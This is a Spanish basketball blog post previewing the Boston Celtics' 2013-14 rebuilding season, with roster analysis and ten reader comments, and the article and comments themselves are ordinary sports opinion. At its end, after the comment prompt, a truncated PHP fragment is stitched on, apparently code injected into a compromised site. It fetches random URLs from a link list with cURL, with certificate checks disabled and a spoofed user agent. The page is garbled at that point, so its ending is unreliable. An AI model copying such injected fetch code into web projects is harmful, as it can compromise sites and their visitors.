Boston Celtics: Pride reboot

24 de October de 2013 por TheDeerHunter

Desde 1950, con la llegada de Auerbach, hasta 1988 (el de la salida de K.C. Jones), los Celtics ganaron 16 títulos, lograron 3 subcampeonatos y disputaron un buen número de finales de conferencia adicionales. Estamos hablando de que disputaban el título una de cada dos temporadas durante esos 38 años y de que lo ganaban casi siempre. Durante este laro periodo de tiempo únicamente se ausentaron de la postemporada en 4 ocasiones, una de ellas (1971) con 44 victorias en su casillero. Son méritos incuestionables para justificar el famoso orgullo. La forja de una leyenda justamente ganada.

Fuera de aquella extraordinaria era debemos señalar que la brillante etapa que hemos vivido recientemente es más excepción que otra cosa. Dejando de lado las 4 primeras campañas de la franquicia donde tampoco se llegó al 50%, desde la 1988/89 hasta la 2006/07 únicamente se alcanzó una final de conferencia en una conferencia Este tremendamente devaluada. En cambio, se ganaron a pulso las vacaciones tempranas hasta en 9 campañas. La captación de estrellas, así como la formación de proyectos ganadores no resultó particularmente sencilla. Por el motivo que sea, Boston dejó de ser el centro baloncestístico del mundo.

En el verano del 2007 los astros se alinearon tanto metafórica como literalmente. Ainge logró fichar simultáneamente a Kevin Garnett y a Ray Allen, y los unió al liderazgo de Paul Pierce y Doc Rivers. Además sonó la flauta con la elección de Rajon Rondo. Todos juntos no sólo fueron capaces de ganar de manera inmediata, sino que lograron imprimir el carácter duro/austero y el orgullo heredado del color de sus camisetas. Un proyecto pensado para 2-3 campañas disputando el anillo, terminó convirtiéndose en un lustro de satisfacciones tanto en las victorias como en las derrotas. Uno de los mejores equipos que algunos hemos visto. 

Los más prácticos hubieran apretado el pedal de la reconstrucción el curso pasado, tras la salida premonitoria de Allen, y posiblemente hubiera sido lo mejor por el camino que ya tendrían recorrido. Para los románticos, en cambio, el proyecto merecía una última oportunidad aún sin una pata tan significativa como el escolta. “Morir con las botas puestas” es la manera con la uno cree que querrían terminar su historia. Lamentablemente no pudimos asistir a otra gran machada de estos “espartanos” en playoffs. Las lágrimas de frustración de un Rondo lesionado, semanas antes, fue el verdadero y triste final anticipado.

Así que, sin más demora, la reconstrucción se ha tenido que afrontar con toda su crudeza. Casi nos atreveríamos a calificarla como excesivamente dura, por la manera, hasta cierto punto elegante, de gestionar las salidas de sus últimas leyendas aún en contra de los propios intereses. Y raro es que Rondo no haya terminado también traspasado, aunque hay muchos lo dan por hecho tarde o temprano. El final de una era.

Lo malo de las reconstrucciones es que se sabe cuando comienzan pero no cuando terminan. Es otro de los motivos por los que parece que los días de Rondo en Boston están contados. Su perfil de all-star consolidado, su edad, su carácter… no parecen las mejores características para hacerle liderar los nuevos tiempos. Los rumores crónicos de su salida tampoco van a favorecer el clima dentro del nuevo vestuario.

No obstante hasta que se resuelva su situación Rajon Rondo continuará siendo el base titular del equipo y su jugador estrella. Será interesante comprobar cómo funciona sin hall of famers a su alrededor. Previsiblemente bajará su ratio de asistencias y deberá asumir más protagonismo en ataque, lo cual quizá no le beneficie. En teoría Avery Bradley es su heredero natural. Tan buen defensor o mejor que el Rondo actual, parecía mejor dotado en ataque. Sin embargo, el año pasado sufrió una extraña involución en su nivel de acierto con respecto a su año shophomore. Se le considera uno de los peores ejecutores de pick&roll de la liga, por ser diestro cerrado y de mejorable habilidad en el pase. Si Bradley no muestra avances mientras Rondo se recupera los Celtics estarán en un serio problema esta campaña. El tercer base en discordia, el undrafted rookie Phil Pressey, ha tenido sus momentos esta pretemporada pero está verde y no puede esperarse de él un gran impacto inmediato.

Brad Stevens cuenta con un amplio abanico de escoltas distintos a su disposición, pero todos con importantes debilidades. Courtney Lee era el encargado, junto a Jason Terry, de hacer olvidar a Ray Allen y como no podía ser de otra manera el batacazo fue importante. Es un correcto defensor pero perjudicado por la estatura. Partía a priori como titular pero es un jugador con excesiva tendencia a borrarse. Parece que durante esta pretemporada Jordan Crawford le está ganando el puesto. Es casi antagónico a Lee, con un talento ofensivo un tanto anárquico y con alergia a la defensa. Posee la discutible virtud de hacer mejorar el ataque de su equipo y del rival en la misma medida. Por su parte Marshon Brooks estaba llamado a ser pieza clave en los Nets antes de la mudanza y de las grandes inversiones. Siendo escolta posee un lanzamiento exterior inaceptable y encima tampoco es un defensor decente. Por último, también tienen a un veterano como Keith Bogans, que es simplemente un experimentado defensor y está para pocos trotes.

El perímetro se completa con dos aleros con ciertas características similares, de instintos interiores. Con el rabillo del ojo vigilando su estado cardíaco, Jeff Green es un jugador de gran envergadura y potencia física. Por su parte, Gerald Wallace está en marcada decadencia y existen dudas razonables sobre su estado mental. Si consigue motivación puede ser un veterano útil y una referencia para los más jóvenes. Si no supondrá un problema, más allá de su tóxico contrato.

Si la salud y la tendencia a cargarse de faltas acompañan Jared Sullinger está llamado a asumir mucho protagonismo en los Celtics en el futuro inmediato. Excelente reboteador y con buena mano, es un 4 ideal si logra permanecer en cancha. Por su parte Khris Humphries llega también despechado desde Brooklyn pero su valor será mayor para los Celtics como jugoso expiring a traspasar antes del deadline que como factor deportivo.

A pesar de su altura, Brandon Bass ha rendido dignamente como pívot durante muchos minutos en este equipo. Será titular, al menos nominalmente y alternará con su posición natural según las necesidades. También está llamado a ser clave Kelly Olynyk a tenor de lo mostrado en las summer leagues y en pretemporada. Un 7 pies de talento que tenemos muchas ganas de seguir en esta liga. Por último a algunos nos sorprendió un poco el aterrizaje del brasileño Vitor Faverani pero tal y como está configurado el equipo podría tener una presencia mayor a la inicialmente esperada.

No nos podemos engañar. El proyecto está diseñado para intentar cazar a Andrew Wiggins y esto es incompatible con los resultados. Se trata de un grupo nuevo, con probables cambios a lo largo de la temporada y sin grandes cualidades visibles. Mucho jugador inexperto y demasiado veterano rebotado de otros equipos. Al menos cuentan con alguna interesante joven pieza a la que habrá que prestar atención próximamente. Será un camino largo y difícil, plagado de incertidumbres. Esperemos que vuelvan lo antes posible.

Quinteto inicial: Rajon Rondo, Jordan Crawford, Jeff Green, Jared Sullinger, Brandon Bass.
6º hombre: Kelly Olynyk

Altas: Keith Bogans (BKN), MarShon Brooks (BKN), Vítor Faverani (N), Kris Humphries (BKN), Kelly Olynyk (N), Phil Pressey (N), Gerald Wallace (BKN).
Bajas: Kevin Garnett (BKN), Fab Melo, Paul Pierce (BKN), Shavlik Randolph, Jason Terry (BKN), D.J. White, Chris Wilcox, Terrence Williams.

Pronóstico: Sobre 25 victorias. Penúltimos de la Atlántico.

Comenta

10 comentarios a esta entrada

  1. franitis dice:
    #1

    Desilusionante y a la vez ilusionante la campaña que nos espera a los seguidores célticos:

    – Ganas de ver qué tal se adapta Stevens a la NBA. Para mí un punto importantísimo tras la salida de Rivers después de tantos años. Una apuesta tremenda después de tener un coach contrastadísimo y con muchísima personalidad pasar a un novato en la NBA. Stevens es un loco de los vídeos y conoce al equipo rival mejor que el propio entrenador de ese equipo, a ver si empieza a conocer a su propio equipo (en la pretemporada ha cambiado el roster titular partido sí y otro también para dar con la tecla) y cuaja una buena temporada.
    – Los nuevos (Olynik, Faverani, Pressey) tienen muy buena pinta. Olynik a poco que empiece a cuajar huele a center titular, tiene muñeca y buenos movimientos en la pintura, pero parece que en poder intimidatorio debe dar más. Faverani ha sido la mejor sensación que me deja la pretemporada, ayer 15 puntos, 7 rebotes y 6 tapones; un tío que llega de la ACB (“El hombre indestructible”) con fundamentos y experiencia; puede aportar mucho al equipo. Y Pressey, el único base puro del equipo tras Rondo, ha cuajado una buena SL y los partidos de pretemporada ha estado bien mientras las lesiones le han respetado; yo me la jugaba con él de titular, ya que no hay nada que perder este año…
    – Wallace y el esfuerzo. Poco a poco nos va ganando con su trabajo. Llegó en el paquete de cambio por KG, PP y Terry, con un contratazo y 31 años… Después de sus números en pretemporada y sobretodo su liderazgo y llamamiento al equipo por su “falta de esfuerzo”, parece que puede ser uno de los líderes de la plantilla y nuevo abanderado del Green Pride…
    – La vuelta de Rondo. Una incógnita su nivel de vuelta, pero se espera al jugador franquicia del equipo como agua de mayo… Su mando, sus ganas, su nivelazo.
    – Jeff Green; suena a que se va a quedar en un buen alero pero nada más… 27 años y no ha dado el paso que se espera de él. Buenos números en PO el año pasado, pero no va a ser un jugador franquicia. Si no arranca este año y se sale va a ser que se queda en un buen sexto hombre y poco más… Saliendo de titular en estos partidos no se ha visto un jugador determinante, que se eche el equipo a los hombros. Y las dobles defensas sobre él son una experiencia nueva y por lo visto traumática para él… A ver…
    – Sullinger; otro que debe dar un paso adelante este año. Hay juego interior si Bass se centra (ayer no lo hizo pero nada mal) junto con los Olynik y Faverani. Sulli tiene competencia y debe trabajar para consolidarse. Buen tiro exterior y fundamentos, pinta bien su año sophomore si no le da problemas su espalda. ¡Pero por favor, que deje de jugarse tantos triples!
    – Los Brooks, Crawford, Bogans, Humphries, Lee… Me sobran; Brooks da la de cal y la de arena, si se centrase sería una buena pieza; en Crawford no veo un mal jugador, pero su selección de tiro es mala mala; Bogans, de vuelta de todo, puede aportar su lanzamiento de tres; Humphries lo dicho, carne de trade en un expiring y Lee no ha dado el nivel que se espera de él, ha perdido la confianza en su juego y es difícil que la recobre (¿¿Le ayudas, Stevens??).
    – Bradley; el día que juegue de 2 y se consolide será una pieza importante del equipo. La ausencia de un PG que supla a Rondo en condiciones lo está matando a base de desubicarlo y darle una responsabilidad que no es suya como base titular.

    Si Stevens sabe juntar todas estas piezas, podemos ver un equipo que llegue a las 30 victorias, y si llega Rondo en buenas condiciones… ¿40 victorias?¿Primera ronda de PO? Me pueden los colores… No creo que llegue a PO. Pero tampoco los veo tanqueando, ya que jugártela a conseguir el premio gordo en el Draft… malas experiencias en años anteriores (¿Billups?).

    Hay 10 millones de una Trade exception esperando, jugadores bonitos para el mercado como Green o Bass con los que conseguir algo y varios picks de primera ronda que se pueden usar bien. Ojito con el impacto en el mercado de los C’s el año que viene (con Melo y compañía como FA), a ver qué hace Ainge con lo que tiene…

      Citar

  2. Hile_Roland dice:
    #2

    Aunque la plantilla se ha debilitado mucho, me da la sensación de que Boston aún tiene demasiado “buen equipo” como para pensar en tankear. No los veo entrando en PO, porque la postemporada va a estar muy cara en el este y veo a 8 bastante fijos, pero en la parte baja de esta conferencia hay un nivel de tankeo impresionante.

    Los 67ers serán el peor equipo con la gorra, me sorprendería que ganaran un solo partido. A partird e ahí no veo por qué los Bucks, Bobcats, Magic o Raptors han de estar por delante de Boston. Si las piezas se acoplan, hay mimbres para hacer una temporada bastante decente

      Citar

  3. Ruxixón dice:
    #3

    Green de 2,de 3,de 4,de combo forward….un lio,y con Wallace en el equipo,intraspasable totalmente,lo mejor es que juegues con el buen cartel de Green,ganado en el último tramo de la pasada temporada,para conseguir algo decente.

    A Olynick creo que le falta para ser un interior de nivel en un equipo serio.Que juegue de titular en estos Celtics sólo se comprende desde los objetivos que persiguen los verdes para esta temporada,pues tiene un déficit en la defensa muy grande.Lo más importante es que definan que tipo de jugador quieren que sean para si ha de ganar músculo,si su proyección es un Nowitzki…eso si,lo primordial lo tiene.Yo confio en que en unos años sea un jugador consolidado en la NBA.De momento como 6º hombre creo que puede ir desarrollando su juego.

    Sobre Jordan Crawford,uno de los más “queridos” en esta página,decir que para mí no es mal jugador,de hecho creo que tiene más cosas que me gusten que las que no.La temporada pasada,mientras Wall estuvo out,cuando Crawford dirigió al equipo fue cuando se vio a los mejores Wizards,así que yo le daría un voto de confianza.

      Citar

  4. r_miller dice:
    #4

    Es una lastima de plantilla y me parece casi peor equipo que Philadelfia. Pero Rondo, Bradley, Green, Bass y Olinick deberian ser los titulares. Humphreys deberia ser traspasado por un jugador tipo Mo Williams, Jordan Crawford podria seguir haber que pasa, Gerald Wallace por un jugador alto que se pegue en la zona porque no tienen como Trevor Booker que seguro que coje rebotes, Sullinger no me gusta nada ya que es muy bajo y el resto del equipo es muy malo. Pero no se va a hacer ningun traspaso asi porque Ainge no respeta a Rondo y no le va a dar un equipo mejorado y va a esperar al Draft, es mas, cada partido ganado por Boston enfadara a su General Manager, una pena…

      Citar

  5. HisRoyalAirness dice:
    #5

    Rondo a NY por Stat que le queda sólo un año!
    Sería la polla en vinagre verle junto a Melo

      Citar

  6. rumbero dice:
    #6

    r_miller:
    Es una lastima de plantilla y me parece casi peor equipo que Philadelfia. Pero Rondo, Bradley, Green, Bass y Olinick deberian ser los titulares. Humphreys deberia ser traspasado por un jugador tipo Mo Williams, Jordan Crawford podria seguir haber que pasa, Gerald Wallace por un jugador alto que se pegue en la zona porque no tienen como Trevor Booker que seguro que coje rebotes, Sullinger no me gusta nada ya que es muy bajo y el resto del equipo es muy malo. Pero no se va a hacer ningun traspaso asi porque Ainge no respeta a Rondo y no le va a dar un equipo mejorado y va a esperar al Draft, es mas, cada partido ganado por Boston enfadara a su General Manager, una pena…

    Hombre ya le puedes meter a estos Celtics a Mo Williams, Bookers y similares que no huelen la postemporada ni de coña. No sé, yo estoy de acuerdo con lo que dice Deer: el reset lo podrían haber hecho perfectamente la temporada pasada, pero no, incluso con la baja de Allen gastaron una última bala en contra de sus propios intereses para darle una última oportunidad a la vieja guardia. En ese sentido, poco que objetar.
    A mi Bradley, Green, Olinyk y Sullinger me parece una buena base. A partir de aquí a ver que pueden sacar por Rondo y con el expiring de Humpries. Eso y tener algo de vista/suerte en los drafts que creo que tienen como 9 primeras rondas en los próximos 5 años (y aunque muchas sean de los Nets y vayan a ser altas no está nada mal)

      Citar

  7. Denise dice:
    #7

    r_miller:
    Es una lastima de plantilla y me parece casi peor equipo que Philadelfia. Pero Rondo, Bradley, Green, Bass y Olinick deberian ser los titulares. Humphreys deberia ser traspasado por un jugador tipo Mo Williams, Jordan Crawford podria seguir haber que pasa, Gerald Wallace por un jugador alto que se pegue en la zona porque no tienen como Trevor Booker que seguro que coje rebotes, Sullinger no me gusta nada ya que es muy bajo y el resto del equipo es muy malo. Pero no se va a hacer ningun traspaso asi porque Ainge no respeta a Rondo y no le va a dar un equipo mejorado y va a esperar al Draft, es mas, cada partido ganado por Boston enfadara a su General Manager, una pena…

    Jo macho, los Celtics no van a ganar al anillo pero como osas decir que son peores que los 76ers, la mayor bazofia en muchos años.
    Boston carece de anotadores pero tiene un puñado de jugadores interesantes, y con un poco de suerte tendran opciones de PO, aunque creo que quedaran 10º.
    Y sobre los primeros parrafos del analisis, los Celtics tienen ese halo de equipo historico, mitico y lo que quieras, pero me recuerdan bastante al Madrid de futbol, siguen anclados y viviendo de los titulos de los años 60 cuando el deporte estaba en una etapa primitiva y poco profesionalizada.

      Citar

  8. franitis dice:
    #8

    En el post que hablaba de los 76ers también comentaste “Van a ganar 9 partidos, contra los bobcats, orlando, phoenix, boston y algun equipo grande tipo clippers que ese dia se confie” y ya me llamó la atención que metieras a los Celtics en el carro…

    Yo veo a los Celtics con rodaje y un quinteto asentado dando guerra, y con la vuelta de Rondo aún más, lógicamente no para ganar el anillo, como bien dice Denise, pero no apostaría por una victoria de 76ers… Que por otro lado sí los veo apostando por tanquear ya que de hecho he leído por ahí que el movimiento de Noel iba encaminado a que se recuperase durante esta temporada (al estilo Griffin) y el año que viene llevarse el premio gordo en el draft (Wiggins). Así tendrían dos números 1 (Noel apuntaba a 1 hasta su lesión) “sin comerlo ni beberlo”…

      Citar

  9. Denise dice:
    #9

    franitis:
    no apostaría por una victoria de 76ers… Que por otro lado sí los veo apostando por tanquear ya que de hecho he leído por ahí que el movimiento de Noel iba encaminado a que se recuperase durante esta temporada (al estilo Griffin) y el año que viene llevarse el premio gordo en el draft (Wiggins). Así tendrían dos números 1 (Noel apuntaba a 1 hasta su lesión) “sin comerlo ni beberlo”…

    En el caso de los 76ers, el tanking no se va a producir en la pista, sino en los despachos de forma descarada.
    Aunque los jugadores se partan el pecho en la cancha, es que no dan para más.
    Ojala se acaben llevando el pick 4 que es la eleccion más baja que puede llevarse el que acaba el último.

      Citar

  10. GreenPride dice:
    #10

    Temporada de transición para Boston. Llegó el fin de la época competitiva del Big Three KG, PP, RA con Ronjo liderando el equipo desde el base y toca reconstruir. Para ello, tienen un puñado de buenos jugadores (Bradley, Green, Sullinger y Olynik principalmente), un base enorme como Rondo y el expiring de Humphries y la trade exception de 10 kilos listos para intentar pillar un gran agente libre este verano. Si a esto sumamos una alta posición en el siguiente draft que viene cargado de talento creo que los Celtics deben mirar al futuro con optimismo. En cuanto a esta temporada pues dar minutos y minutos a los jóvenes, dejar que Rondo vuelva y cambie el chip para que anote más e ir preparando el terreno para la salida de lo que sobra (Brooks, Crawford, Wallace, Humphries y demás). Va a ser difícil no ver a los verdes entre los animadores de la competición…. esperemos que vuelvan pronto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>